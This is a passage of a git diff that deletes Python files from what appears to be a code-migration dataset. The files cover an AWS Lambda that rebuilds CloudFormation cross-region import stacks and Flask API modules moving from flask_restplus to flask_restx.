cross_stack_ref_table.scan() - cross_stack_references = scan_response['Items'] - - while scan_response.get('LastEvaluatedKey'): - scan_response = cross_stack_ref_table.scan(ExclusiveStartKey=scan_response['LastEvaluatedKey']) - cross_stack_references.extend(scan_response['Items']) - - if cross_stack_references: - number_of_chunk = len(cross_stack_references) / MAX_RESOURCES_PER_TEMPLATE - max_group_size = int(max(min(RESSOURCE_BY_GROUP/number_of_chunk, RESSOURCE_BY_GROUP), 1)) - - nested_template_urls = [] - for items in _chunks(cross_stack_references, MAX_RESOURCES_PER_TEMPLATE): - nested_template_urls.append(_generate_nested_template(items, max_group_size)) - - master_template_resources = {} - for i, url in enumerate(nested_template_urls): - master_template_resources[f"ParameterChunk{i}"] = { - "Type": "AWS::CloudFormation::Stack", - "Properties": { - "TemplateURL": url - } - } - else: - master_template_resources = { - 'PlaceHolderParameter': { - 'Type': 'AWS::SSM::Parameter', - 'Properties': { - 'Value': {'Ref': "AWS::StackName"}, - 'Type': 'String' - }, - } - } - - master_template = { - 'AWSTemplateFormatVersion': '2010-09-09', - 'Description': 'Auto-generated templates to simulate the standard importation behaviour on other regions', - 'Resources': master_template_resources - } - - cloudformation_client = boto3.client('cloudformation') - - _upload_template(os.environ['GENERATED_STACK_NAME'], json.dumps(master_template)) - template_url = _build_unsigned_url(os.environ['GENERATED_STACK_NAME']) - - try: - cloudformation_client.update_stack( - StackName=os.environ['GENERATED_STACK_NAME'], - TemplateURL=template_url, - ) - except botocore.exceptions.ClientError as e: - message = e.response['Error']['Message'] - if 'does not exist' in message: - cloudformation_client.create_stack( - StackName=os.environ['GENERATED_STACK_NAME'], - TemplateURL=template_url, - ) - elif 'No updates are to be performed.' in message: - print('No updates are to be performed.') - else: - raise - - -def _generate_hash(string_to_hash): - return hashlib.sha224(string_to_hash.encode()).hexdigest() - - -def _upload_template(template_name, template_content): - s3_resource = boto3.resource('s3') - template_object = s3_resource.Object(os.environ['TEMPLATE_BUCKET'], template_name) - template_object.put(Body=template_content.encode()) - - -def _build_unsigned_url(template_name): - s3_resource = boto3.resource('s3') - template_object = s3_resource.Object( - os.environ['TEMPLATE_BUCKET'], - template_name - ) - - return '{host}/{bucket}/{key}'.format( - host=template_object.meta.client.meta.endpoint_url, - bucket=template_object.bucket_name, - key=template_object.key, - ) - - -def _generate_nested_template(cross_stack_references, max_group_size): - last_ref_id = None - ssm_resources = {} - resource_count = 0 - - for ref in cross_stack_references: - ref_id = _generate_hash(ref['CrossStackRefId']) - ssm_resource = { - 'Type': 'AWS::SSM::Parameter', - 'Properties': { - 'Name': {'Fn::Sub': "${AWS::StackName}." + ref_id}, - 'Description': f'Imported by {ref["ImporterStackId"]}.{ref["ImporterLogicalResourceId"]}.{ref["ImporterLabel"]}', - 'Value': {'Fn::ImportValue': ref['ExportName']}, - 'Type': 'String' - }, - } - - if last_ref_id: - ssm_resource['DependsOn'] = last_ref_id # Required to prevent SSM throttling exceptions - - ssm_resources[ref_id] = ssm_resource - - if resource_count % max_group_size == 0: - last_ref_id = ref_id - - resource_count += 1 - - imports_replication_template = { - 'AWSTemplateFormatVersion': '2010-09-09', - 'Resources': ssm_resources - } - - template_name = f'{os.environ["GENERATED_STACK_NAME"]}.{uuid4()}' - - _upload_template(template_name, json.dumps(imports_replication_template)) - return _build_unsigned_url(template_name) - - -def _chunks(l, n): - for i in range(0, len(l), n): - yield l[i:i + n] diff --git a/v1/data/codefile/pokainc@cfn-cross-region-export__f1120d3__exporter$lambda$cross_region_import_replication.py.target.py b/v1/data/codefile/pokainc@cfn-cross-region-export__f1120d3__exporter$lambda$cross_region_import_replication.py.target.py deleted file mode 100644 index 78d1aec..0000000 --- a/v1/data/codefile/pokainc@cfn-cross-region-export__f1120d3__exporter$lambda$cross_region_import_replication.py.target.py +++ /dev/null @@ -1,126 +0,0 @@ -import hashlib -import json -import os -from uuid import uuid4 - -import boto3 -import botocore -import sentry_sdk -from sentry_sdk.integrations.aws_lambda import AwsLambdaIntegration - -sentry_sdk.init(integrations=[AwsLambdaIntegration(timeout_warning=True)]) - -MAX_OUTPUTS_PER_TEMPLATE = 200 - - -def lambda_handler(*_): - try: - _lambda_handler() - except: - raise - - -def _lambda_handler(): - dynamodb_resource = boto3.resource("dynamodb") - cross_stack_ref_table = dynamodb_resource.Table(os.environ["CROSS_STACK_REF_TABLE_NAME"]) - - scan_response = cross_stack_ref_table.scan() - cross_stack_references = scan_response["Items"] - - while scan_response.get("LastEvaluatedKey"): - scan_response = cross_stack_ref_table.scan(ExclusiveStartKey=scan_response["LastEvaluatedKey"]) - cross_stack_references.extend(scan_response["Items"]) - - if cross_stack_references: - nested_template_urls = [] - for items in _chunks(cross_stack_references, MAX_OUTPUTS_PER_TEMPLATE): - nested_template_urls.append(_generate_nested_template(items)) - - master_template_resources = {} - for i, url in enumerate(nested_template_urls): - master_template_resources[f"Chunk{i}"] = {"Type": "AWS::CloudFormation::Stack", "Properties": {"TemplateURL": url}} - else: - master_template_resources = { - "PlaceHolderResource": { - "Type": "AWS::CloudFormation::WaitConditionHandle", - "Properties": {}, - } - } - - master_template = { - "AWSTemplateFormatVersion": "2010-09-09", - "Description": "Auto-generated templates to simulate the standard importation behaviour on other regions", - "Resources": master_template_resources, - } - - cloudformation_client = boto3.client("cloudformation") - - _upload_template(os.environ["GENERATED_STACK_NAME"], json.dumps(master_template)) - template_url = _build_unsigned_url(os.environ["GENERATED_STACK_NAME"]) - - try: - cloudformation_client.update_stack( - StackName=os.environ["GENERATED_STACK_NAME"], - TemplateURL=template_url, - ) - except botocore.exceptions.ClientError as e: - message = e.response["Error"]["Message"] - if "does not exist" in message: - cloudformation_client.create_stack( - StackName=os.environ["GENERATED_STACK_NAME"], - TemplateURL=template_url, - ) - elif "No updates are to be performed." in message: - print("No updates are to be performed.") - else: - raise - - -def _generate_hash(string_to_hash): - return hashlib.sha224(string_to_hash.encode()).hexdigest() - - -def _upload_template(template_name, template_content): - s3_resource = boto3.resource("s3") - template_object = s3_resource.Object(os.environ["TEMPLATE_BUCKET"], template_name) - template_object.put(Body=template_content.encode()) - - -def _build_unsigned_url(template_name): - s3_resource = boto3.resource("s3") - template_object = s3_resource.Object(os.environ["TEMPLATE_BUCKET"], template_name) - - return "{host}/{bucket}/{key}".format( - host=template_object.meta.client.meta.endpoint_url, - bucket=template_object.bucket_name, - key=template_object.key, - ) - - -def _generate_nested_template(cross_stack_references): - template = { - "AWSTemplateFormatVersion": "2010-09-09", - "Resources": { - "PlaceHolderResource": {"Type": "AWS::CloudFormation::WaitConditionHandle", "Properties": {}}, - }, - "Outputs": {}, - } - - for ref in cross_stack_references: - ref_id = _generate_hash(ref["CrossStackRefId"]) - output = { - "Value": {"Fn::ImportValue": ref["ExportName"]}, - "Description": f'Imported by {ref["ImporterStackId"]}.{ref["ImporterLogicalResourceId"]}.{ref["ImporterLabel"]}', - } - - template["Outputs"][ref_id] = output - - template_name = f'{os.environ["GENERATED_STACK_NAME"]}.{uuid4()}' - - _upload_template(template_name, json.dumps(template)) - return _build_unsigned_url(template_name) - - -def _chunks(l, n): - for i in range(0, len(l), n): - yield l[i : i + n] diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$IocManager.py.diff b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$IocManager.py.diff deleted file mode 100644 index bbeacb5..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$IocManager.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/src/api/IocManager.py b/src/api/IocManager.py - index 4b218d2649130a1cce9bb48e838e9051996bbdef..598f275f11bdb1796b4ea0f6b3676a45758c08c4 100644 - --- a/src/api/IocManager.py - +++ b/src/api/IocManager.py -@@ -3,7 +3,7 @@ import os - import sys - from flask import Flask - from flask_injector import request, FlaskInjector --from flask_restplus import Api -+from flask_restx import Api - from injector import singleton, Injector, threadlocal, Binder - from sqlalchemy import MetaData - from sqlalchemy.ext.declarative import declarative_base diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$IocManager.py.source.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$IocManager.py.source.py deleted file mode 100644 index f764763..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$IocManager.py.source.py +++ /dev/null @@ -1,143 +0,0 @@ -from multiprocessing.process import current_process -import os -import sys -from flask import Flask -from flask_injector import request, FlaskInjector -from flask_restplus import Api -from injector import singleton, Injector, threadlocal, Binder -from sqlalchemy import MetaData -from sqlalchemy.ext.declarative import declarative_base -from infrastructor.api.ResourceBase import ResourceBase -from infrastructor.dependency.scopes import ISingleton, IScoped -from infrastructor.logging.ConsoleLogger import ConsoleLogger -from infrastructor.utils.ConfigManager import ConfigManager -from infrastructor.utils.Utils import Utils -from models.configs.ApiConfig import ApiConfig -from models.configs.ApplicationConfig import ApplicationConfig -from models.configs.DatabaseConfig import DatabaseConfig -from models.configs.SchedulerRpcClientConfig import SchedulerRpcClientConfig - - -class IocManager: - app: Flask = None - api: Api = None - binder: Binder = None - app_wrapper = None - config_manager = None - injector: Injector = None - Base = declarative_base(metadata=MetaData(schema='Common')) - - @staticmethod - def initialize(): - root_directory = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)))) - IocManager.configure_startup(root_directory) - - @staticmethod - def set_app_wrapper(app_wrapper=None): - IocManager.app_wrapper = app_wrapper - - @staticmethod - def initialize_flask(): - - application_config: ApplicationConfig = IocManager.config_manager.get(ApplicationConfig) - IocManager.app = Flask(application_config.name) - authorizations = { - 'apikey': { - 'type': 'apiKey', - 'in': 'header', - 'name': 'X-API' - }, - 'oauth2': { - 'type': 'oauth2', - 'flow': 'accessCode', - 'tokenUrl': 'https://somewhere.com/token', - 'authorizationUrl': 'https://somewhere.com/auth', - 'scopes': { - 'read': 'Grant read-only access', - 'write': 'Grant read-write access', - } - } - } - IocManager.api = Api(IocManager.app, security=['apikey', {'oauth2': 'read'}], authorizations=authorizations) - # Flask instantiate - # IocManager.api = Api(app=IocManager.app,authorizations=authorizations, security='apikey') - - # wrapper required for dependency - @staticmethod - def configure_startup(root_directory): - # Configuration initialize - IocManager.config_manager = ConfigManager(root_directory) - IocManager.process_info() - - IocManager.initialize_flask() - - # Importing all modules for dependency - sys.path.append(root_directory) - folders = Utils.find_sub_folders(root_directory) - module_list, module_attr_list = Utils.get_modules(folders) - - IocManager.injector = Injector() - # Flask injector configuration - IocManager.set_database_application_name() - FlaskInjector(app=IocManager.app, modules=[IocManager.configure], injector=IocManager.injector) - - @staticmethod - def set_database_application_name(): - application_config = IocManager.config_manager.get(ApplicationConfig) - database_config: DatabaseConfig = IocManager.config_manager.get(DatabaseConfig) - if database_config.application_name is None: - process_info = IocManager.get_process_info() - IocManager.config_manager.set(DatabaseConfig, "application_name", - f"{application_config.name}-({process_info})") - - @staticmethod - def run(): - IocManager.injector.get(IocManager.app_wrapper).run() - - @staticmethod - def configure(binder: Binder): - IocManager.binder = binder - - for config in IocManager.config_manager.get_all(): - binder.bind( - config.get("type"), - to=config.get("instance"), - scope=singleton, - ) - - for singletonScope in ISingleton.__subclasses__(): - binder.bind( - singletonScope, - to=singletonScope, - scope=singleton, - ) - - for scoped in IScoped.__subclasses__(): - binder.bind( - scoped, - to=scoped, - scope=threadlocal, - ) - - for controller in ResourceBase.__subclasses__(): - binder.bind( - controller, - to=controller, - scope=request, - ) - if IocManager.app_wrapper is not None: - api_config = IocManager.config_manager.get(ApiConfig) - binder.bind( - IocManager.app_wrapper, - to=IocManager.app_wrapper(api_config) - ) - - @staticmethod - def get_process_info(): - return f"{current_process().name} ({os.getpid()},{os.getppid()})" - - @staticmethod - def process_info(): - logger = ConsoleLogger() - application_config: ApplicationConfig = IocManager.config_manager.get(ApplicationConfig) - logger.info(f"Application : {application_config.name}") diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$IocManager.py.target.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$IocManager.py.target.py deleted file mode 100644 index e1cb23a..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$IocManager.py.target.py +++ /dev/null @@ -1,143 +0,0 @@ -from multiprocessing.process import current_process -import os -import sys -from flask import Flask -from flask_injector import request, FlaskInjector -from flask_restx import Api -from injector import singleton, Injector, threadlocal, Binder -from sqlalchemy import MetaData -from sqlalchemy.ext.declarative import declarative_base -from infrastructor.api.ResourceBase import ResourceBase -from infrastructor.dependency.scopes import ISingleton, IScoped -from infrastructor.logging.ConsoleLogger import ConsoleLogger -from infrastructor.utils.ConfigManager import ConfigManager -from infrastructor.utils.Utils import Utils -from models.configs.ApiConfig import ApiConfig -from models.configs.ApplicationConfig import ApplicationConfig -from models.configs.DatabaseConfig import DatabaseConfig -from models.configs.SchedulerRpcClientConfig import SchedulerRpcClientConfig - - -class IocManager: - app: Flask = None - api: Api = None - binder: Binder = None - app_wrapper = None - config_manager = None - injector: Injector = None - Base = declarative_base(metadata=MetaData(schema='Common')) - - @staticmethod - def initialize(): - root_directory = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)))) - IocManager.configure_startup(root_directory) - - @staticmethod - def set_app_wrapper(app_wrapper=None): - IocManager.app_wrapper = app_wrapper - - @staticmethod - def initialize_flask(): - - application_config: ApplicationConfig = IocManager.config_manager.get(ApplicationConfig) - IocManager.app = Flask(application_config.name) - authorizations = { - 'apikey': { - 'type': 'apiKey', - 'in': 'header', - 'name': 'X-API' - }, - 'oauth2': { - 'type': 'oauth2', - 'flow': 'accessCode', - 'tokenUrl': 'https://somewhere.com/token', - 'authorizationUrl': 'https://somewhere.com/auth', - 'scopes': { - 'read': 'Grant read-only access', - 'write': 'Grant read-write access', - } - } - } - IocManager.api = Api(IocManager.app, security=['apikey', {'oauth2': 'read'}], authorizations=authorizations) - # Flask instantiate - # IocManager.api = Api(app=IocManager.app,authorizations=authorizations, security='apikey') - - # wrapper required for dependency - @staticmethod - def configure_startup(root_directory): - # Configuration initialize - IocManager.config_manager = ConfigManager(root_directory) - IocManager.process_info() - - IocManager.initialize_flask() - - # Importing all modules for dependency - sys.path.append(root_directory) - folders = Utils.find_sub_folders(root_directory) - module_list, module_attr_list = Utils.get_modules(folders) - - IocManager.injector = Injector() - # Flask injector configuration - IocManager.set_database_application_name() - FlaskInjector(app=IocManager.app, modules=[IocManager.configure], injector=IocManager.injector) - - @staticmethod - def set_database_application_name(): - application_config = IocManager.config_manager.get(ApplicationConfig) - database_config: DatabaseConfig = IocManager.config_manager.get(DatabaseConfig) - if database_config.application_name is None: - process_info = IocManager.get_process_info() - IocManager.config_manager.set(DatabaseConfig, "application_name", - f"{application_config.name}-({process_info})") - - @staticmethod - def run(): - IocManager.injector.get(IocManager.app_wrapper).run() - - @staticmethod - def configure(binder: Binder): - IocManager.binder = binder - - for config in IocManager.config_manager.get_all(): - binder.bind( - config.get("type"), - to=config.get("instance"), - scope=singleton, - ) - - for singletonScope in ISingleton.__subclasses__(): - binder.bind( - singletonScope, - to=singletonScope, - scope=singleton, - ) - - for scoped in IScoped.__subclasses__(): - binder.bind( - scoped, - to=scoped, - scope=threadlocal, - ) - - for controller in ResourceBase.__subclasses__(): - binder.bind( - controller, - to=controller, - scope=request, - ) - if IocManager.app_wrapper is not None: - api_config = IocManager.config_manager.get(ApiConfig) - binder.bind( - IocManager.app_wrapper, - to=IocManager.app_wrapper(api_config) - ) - - @staticmethod - def get_process_info(): - return f"{current_process().name} ({os.getpid()},{os.getppid()})" - - @staticmethod - def process_info(): - logger = ConsoleLogger() - application_config: ApplicationConfig = IocManager.config_manager.get(ApplicationConfig) - logger.info(f"Application : {application_config.name}") diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$common$models$CommonModels.py.diff b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$common$models$CommonModels.py.diff deleted file mode 100644 index 69d4238..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$common$models$CommonModels.py.diff +++ /dev/null @@ -1,55 +0,0 @@ -diff --git a/src/api/controllers/common/models/CommonModels.py b/src/api/controllers/common/models/CommonModels.py - index 4b218d2649130a1cce9bb48e838e9051996bbdef..598f275f11bdb1796b4ea0f6b3676a45758c08c4 100644 - --- a/src/api/controllers/common/models/CommonModels.py - +++ b/src/api/controllers/common/models/CommonModels.py -@@ -1,18 +1,44 @@ -+import json -+import traceback - from datetime import datetime - --from flask_restplus import fields -+from flask_restx import fields - - from IocManager import IocManager -+from infrastructor.data.DatabaseSessionManager import DatabaseSessionManager - from infrastructor.exceptions.OperationalException import OperationalException -+from infrastructor.logging.SqlLogger import SqlLogger - - - @IocManager.api.errorhandler(OperationalException) --def handle_error(error): -- return CommonModels.get_error_response(message=error) -+def handle_operational_exception(exception): -+ separator = '|' -+ default_content_type = "application/json" -+ mime_type_string = "mimetype" -+ """Return JSON instead of HTML for HTTP errors.""" -+ IocManager.injector.get(DatabaseSessionManager).rollback() -+ # start with the correct headers and status code from the error -+ exception_traceback = traceback.format_exc() -+ output = separator.join(exception.args) -+ # replace the body with JSON -+ # response = json.dumps() -+ output_message = "empty" -+ if output is not None and output != "": -+ output_message = output -+ trace_message = "empty" -+ if exception_traceback is not None and exception_traceback != "": -+ trace_message = exception_traceback -+ IocManager.injector.get(SqlLogger).error(f'Operational Exception Messsage:{output_message} - Trace:{trace_message}') -+ return { -+ "result": "", -+ "isSuccess": "false", -+ "message": output -+ }, 400, {mime_type_string: default_content_type} - --@IocManager.api.errorhandler(Exception) --def handle_error(error): -- return CommonModels.get_error_response(message=error) -+ -+# @IocManager.api.errorhandler(Exception) -+# def handle_error(error): -+# return CommonModels.get_error_response(message=error) - - class CommonModels: - SuccessModel = IocManager.api.model('SuccessModel', { diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$common$models$CommonModels.py.source.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$common$models$CommonModels.py.source.py deleted file mode 100644 index bb68ea4..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$common$models$CommonModels.py.source.py +++ /dev/null @@ -1,40 +0,0 @@ -from datetime import datetime - -from flask_restplus import fields - -from IocManager import IocManager -from infrastructor.exceptions.OperationalException import OperationalException - - -@IocManager.api.errorhandler(OperationalException) -def handle_error(error): - return CommonModels.get_error_response(message=error) - -@IocManager.api.errorhandler(Exception) -def handle_error(error): - return CommonModels.get_error_response(message=error) - -class CommonModels: - SuccessModel = IocManager.api.model('SuccessModel', { - 'IsSuccess': fields.Boolean(description='Service finished operation with successfully', default=True), - 'Message': fields.String(description='Service result values', default="Operation Completed"), - 'Result': fields.Raw(description='Service result values'), - }) - - def date_converter(o): - if isinstance(o, datetime): - return o.__str__() - @staticmethod - def get_response(result=None, message=None): - return {'Result': result, 'Message': message} - - @staticmethod - def get_error_response(message): - return {"IsSuccess": False, 'Message': message} - - -class EntityModel: - def __init__(self, - Id: int = None, - ): - self.Id: int = Id diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$common$models$CommonModels.py.target.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$common$models$CommonModels.py.target.py deleted file mode 100644 index 9c81e67..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$common$models$CommonModels.py.target.py +++ /dev/null @@ -1,66 +0,0 @@ -import json -import traceback -from datetime import datetime - -from flask_restx import fields - -from IocManager import IocManager -from infrastructor.data.DatabaseSessionManager import DatabaseSessionManager -from infrastructor.exceptions.OperationalException import OperationalException -from infrastructor.logging.SqlLogger import SqlLogger - - -@IocManager.api.errorhandler(OperationalException) -def handle_operational_exception(exception): - separator = '|' - default_content_type = "application/json" - mime_type_string = "mimetype" - """Return JSON instead of HTML for HTTP errors.""" - IocManager.injector.get(DatabaseSessionManager).rollback() - # start with the correct headers and status code from the error - exception_traceback = traceback.format_exc() - output = separator.join(exception.args) - # replace the body with JSON - # response = json.dumps() - output_message = "empty" - if output is not None and output != "": - output_message = output - trace_message = "empty" - if exception_traceback is not None and exception_traceback != "": - trace_message = exception_traceback - IocManager.injector.get(SqlLogger).error(f'Operational Exception Messsage:{output_message} - Trace:{trace_message}') - return { - "result": "", - "isSuccess": "false", - "message": output - }, 400, {mime_type_string: default_content_type} - - -# @IocManager.api.errorhandler(Exception) -# def handle_error(error): -# return CommonModels.get_error_response(message=error) - -class CommonModels: - SuccessModel = IocManager.api.model('SuccessModel', { - 'IsSuccess': fields.Boolean(description='Service finished operation with successfully', default=True), - 'Message': fields.String(description='Service result values', default="Operation Completed"), - 'Result': fields.Raw(description='Service result values'), - }) - - def date_converter(o): - if isinstance(o, datetime): - return o.__str__() - @staticmethod - def get_response(result=None, message=None): - return {'Result': result, 'Message': message} - - @staticmethod - def get_error_response(message): - return {"IsSuccess": False, 'Message': message} - - -class EntityModel: - def __init__(self, - Id: int = None, - ): - self.Id: int = Id diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$connection$models$ConnectionModels.py.diff b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$connection$models$ConnectionModels.py.diff deleted file mode 100644 index d5812a2..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$connection$models$ConnectionModels.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/src/api/controllers/connection/models/ConnectionModels.py b/src/api/controllers/connection/models/ConnectionModels.py - index 4b218d2649130a1cce9bb48e838e9051996bbdef..598f275f11bdb1796b4ea0f6b3676a45758c08c4 100644 - --- a/src/api/controllers/connection/models/ConnectionModels.py - +++ b/src/api/controllers/connection/models/ConnectionModels.py -@@ -1,7 +1,7 @@ - import json - from typing import List - --from flask_restplus import fields -+from flask_restx import fields - - from controllers.common.models.CommonModels import EntityModel, CommonModels - from IocManager import IocManager diff --git a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$connection$models$ConnectionModels.py.source.py b/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$connection$models$ConnectionModels.py.source.py deleted file mode 100644 index 3d2f001..0000000 --- a/v1/data/codefile/pythondataintegrator@pythondataintegrator__598f275__src$api$controllers$connection$models$ConnectionModels.py.source.py +++ /dev/null @@ -1,357 +0,0 @@ -import json -from typing import List - -from flask_restplus import fields - -from controllers.common.models.CommonModels import EntityModel, CommonModels -from IocManager import IocManager -from models.dao.connection import ConnectionFile, ConnectionServer, ConnectionQueue -from models.dao.connection.Connection import Connection -from models.dao.connection.ConnectionDatabase import ConnectionDatabase -from models.dao.connection.ConnectorType import ConnectorType -from models.dao.connection.ConnectionType import ConnectionType - - -class ConnectionTypeModel(EntityModel): - - def __init__(self, - Id=None, - Name=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Name = Name - - -class ConnectorTypeModel(EntityModel): - - def __init__(self, - Id=None, - Name=None, - ConnectionType=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Name = Name - self.ConnectionType = ConnectionType - - -class ConnectionModel(EntityModel): - def __init__(self, - Id=None, - Name=None, - ConnectionType=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Name = Name - self.ConnectionType = ConnectionType - - -class ConnectionServerModel(EntityModel): - - def __init__(self, - Id=None, - Host=None, - Port=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Host = Host - self.Port = Port - - -class ConnectionDatabaseModel(EntityModel): - - def __init__(self, - Id=None, - Sid: str = None, - ServiceName: str = None, - DatabaseName: str = None, - User: str = None, - Password: str = None, - Connection=None, - ConnectorType=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Sid: str = Sid - self.ServiceName: str = ServiceName - self.DatabaseName: str = DatabaseName - self.User: str = User - self.Password: str = Password - self.Connection = Connection - self.ConnectorType = ConnectorType - - -class ConnectionFileModel(EntityModel): - - def __init__(self, - Id=None, - User: str = None, - Password: str = None, - Connection=None, - ConnectorType=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.User: str = User - self.Password: str = Password - self.Connection = Connection - self.ConnectorType = ConnectorType - - -class ConnectionQueueModel(EntityModel): - - def __init__(self, - Id=None, - Protocol: str = None, - Mechanism: str = None, - User: str = None, - Password: str = None, - Connection=None, - ConnectorType=None, - *args, **kwargs): - super().__init__(*args, **kwargs) - self.Id = Id - self.Protocol: str = Protocol - self.Mechanism: str = Mechanism - self.User: str = User - self.Password: str = Password - self.Connection = Connection - self.ConnectorType = ConnectorType - - -class ConnectionModels: - ns = IocManager.api.namespace('Connection', description='Connection endpoints', path='/api/Connection') - - create_connection_database_model = IocManager.api.model('ConnectionDatabaseModel', { - 'Name': fields.String(description='Operation code value', required=True), - 'ConnectorTypeName': fields.String(description='ConnectorTypeName', required=True), - 'Host': fields.String(description='Host'), - 'Port': fields.Integer(description='Port'), - 'Sid': fields.String(description='Sid'), - 'ServiceName': fields.String(description='ServiceName'), - 'DatabaseName': fields.String(description='DatabaseName'), - 'User': fields.String(description='User'), - 'Password': fields.String(description='Password'), - }) - - create_connection_file_model = IocManager.api.model('ConnectionFileModel', { - 'Name': fields.String(description='Operation code value', required=True), - 'ConnectorTypeName': fields.String(description='ConnectorTypeName', required=True), - 'Host': fields.String(description='Host'), - 'Port': fields.Integer(description='Port'), - 'User': fields.String(description='User'), - 'Password': fields.String(description='Password'), - }) - create_connection_server_model = IocManager.api.model('ConnectionServerModel', { - 'Host': fields.String(description='Host'), - 'Port': fields.Integer(description='Port'), - }) - create_connection_queue_model = IocManager.api.model('ConnectionQueueModel', { - 'Name': fields.String(description='Operation code value', required=True), - 'ConnectorTypeName': fields.String(description='ConnectorTypeName', required=True), - 'Servers': fields.List(fields.Nested(create_connection_server_model), description='Queue Servers', - required=False), - 'Protocol': fields.String(description='Protocol'), - 'Mechanism': fields.String(description='Mechanism'), - 'User': fields.String(description='User'), - 'Password': fields.String(description='Password'), - }) - - delete_connection_database_model = IocManager.api.model('DeleteConnectionDatabaseModel', { - 'Id': fields.Integer(description='Connection Database Id', required=True), - }) - - check_connection_database_model = IocManager.api.model('CheckConnectionDatabaseModel', { - 'Name': fields.String(description='Connection Name', required=True), - 'Schema': fields.String(description='Schema For Check Connection', required=False, example=""), - 'Table': fields.String(description='Table For Check Connection', required=False, example=""), - }) - - @staticmethod - def get_connection_server_model(connection_server: ConnectionServer) -> ConnectionServerModel: - entity_model = ConnectionServerModel( - Id=connection_server.Id, - Host=connection_server.Host, - Port=connection_server.Port, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - return result_model - - @staticmethod - def get_connection_server_models(connection_servers: List[ConnectionServer]) -> List[ConnectionServerModel]: - - entities = [] - for connection_server in connection_servers: - if connection_server.IsDeleted == 0: - entity = ConnectionModels.get_connection_server_model(connection_server) - entities.append(entity) - return entities - - @staticmethod - def get_connection_type_model(connection_type: ConnectionType) -> ConnectionTypeModel: - entity_model = ConnectionTypeModel( - Id=connection_type.Id, - Name=connection_type.Name, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - return result_model - - @staticmethod - def get_connection_type_models(connection_types: List[ConnectionType]) -> List[ConnectionTypeModel]: - - entities = [] - for connection_type in connection_types: - entity = ConnectionModels.get_connection_type_model(connection_type) - entities.append(entity) - return entities - - @staticmethod - def get_connector_type_model(connector_type: ConnectorType) -> ConnectorTypeModel: - connection_type = ConnectionModels.get_connection_type_model(connector_type.ConnectionType) - entity_model = ConnectorTypeModel( - Id=connector_type.Id, - Name=connector_type.Name, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectionType'] = connection_type - - return result_model - - @staticmethod - def get_connector_type_models(connector_types: List[ConnectorType]) -> List[ConnectorTypeModel]: - - entities = [] - for connector_type in connector_types: - entity = ConnectionModels.get_connector_type_model(connector_type) - entities.append(entity) - return entities - - @staticmethod - def get_connection_model(connection: Connection) -> ConnectionModel: - connection_type = ConnectionModels.get_connection_type_model(connection.ConnectionType) - entity_model = ConnectionModel( - Id=connection.Id, - Name=connection.Name, - ) - result_model = json.loads(json.dumps(entity_model.__dict__, default=CommonModels.date_converter)) - result_model['ConnectionType'] = connection_type - return result_model - - @staticmethod - def get_connection_database_entity_model(connection_database: ConnectionDatabase) -> ConnectionDatabaseModel: - entity_model = ConnectionDatabaseModel( - Id=connection_database.Id, - Sid=connection_database.Sid, - ServiceName=connection_database.ServiceName, - DatabaseName=connection_database.DatabaseName, - User='***', # connection_database.User - Password='***' # connection_database.Password - ) - return entity_model - - @staticmethod - def get_connection_file_entity_model(connection_file: ConnectionFile) -> ConnectionFileModel: - entity_model = ConnectionFileModel( - Id=connection_file.Id, - User='***', # connection_database.User - Password='***' # connection_database.Password - ) - return entity_model - - @staticmethod - def get_connection_queue_entity_model(connection_queue: ConnectionQueue) -> ConnectionQueueModel: - entity_model = ConnectionQueueModel( - Id=connection_queue.Id, - Protocol=connection_queue.Protocol, - Mechanism=connection_queue.Mechanism, - User='***', # connection_database.User - Password='***' # connection_database.Password - ) - return entity_model - - @staticmethod - def get_connection_database_model(connection_database: ConnectionDatabase) -> ConnectionDatabaseModel: - connection = ConnectionModels.get_connection_model(connection_database.Connection) - connector_type = ConnectionModels.get_connector_type_model(connection_database.ConnectorType) - entity_model = ConnectionModels.get_connection_database_entity_model(connection_database) - result_model = 